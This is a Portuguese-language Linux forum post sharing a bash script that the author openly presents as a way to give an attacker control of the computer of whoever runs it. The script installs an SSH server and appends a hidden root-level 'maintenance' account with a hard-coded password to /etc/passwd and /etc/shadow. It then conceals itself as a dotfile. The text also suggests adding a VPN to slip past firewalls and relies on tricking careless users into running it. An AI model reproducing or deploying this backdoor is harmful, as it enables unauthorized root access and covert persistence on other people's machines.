Criando usuário com poderes de root
Publicado por Marcelo (última atualização em 17/10/2009)
[ Hits: 7.183 ]
Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.
Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.
É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!
#!/bin/bash # verifica se o usuário está como root if [ "`id -u`" != "0" ]; then echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.' read pausa exit 0 fi # verifica se o script de cadastro de senha existe, se não, ele mesmo o cria # o usuário será maintenance e a senha mdpasswd if [ "`find -name cad.main`" = "" ]; then touch cad.main echo "#!/usr/bin/expect" >> cad.main echo "set timeout 30" >> cad.main echo "spawn passwd maintenance" >> cad.main echo "set password \"mdpasswd"\" >> cad.main echo "expect \"Enter new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "expect \"Retype new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "send \"exit"\" >> cad.main echo "expect \"eof\"" >> cad.main chmod +x cad.main fi # verifica se o programa expect está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep expect `" = "" ]; then aptitude install expect >> /dev/null fi # verifica se o servidor ssh está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep openssh-server`" = "" ]; then aptitude install openssh-server >> /dev/null fi # verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then expect cad.main >> /dev/null exit 0 fi # se o usuário não existir, ele será criado echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow expect cad.main >> /dev/null # remove o arquivo de cadastro de usuário rm -rf cad.min # oculta este script mv login.super .login.super exit 1
Criação de servidores de arquivos simples com Samba
Script para acertar hora e data do sistema no linux.
Organize seu /var/log/messages
Nenhum coment�rio foi encontrado.
Kernel 6.18 em foco, betas fervilhando e avanços em IA no Linux
O que é o THP na configuração de RAM do Linux e quando desabilitá-lo
Comparação entre os escalonadores BFQ e MQ-Deadline (acesso a disco) no Arch e Debian
Adicionando o repositório backports no Debian 13 Trixie
Como definir um IP estático no Linux Debian
Primeiras impressões do Debian 13 (18)
intervenção politica pode interver no Fedora Linux (7)
Fedora não reconhece James Donkey 102 Wireless Gaming Mouse (0)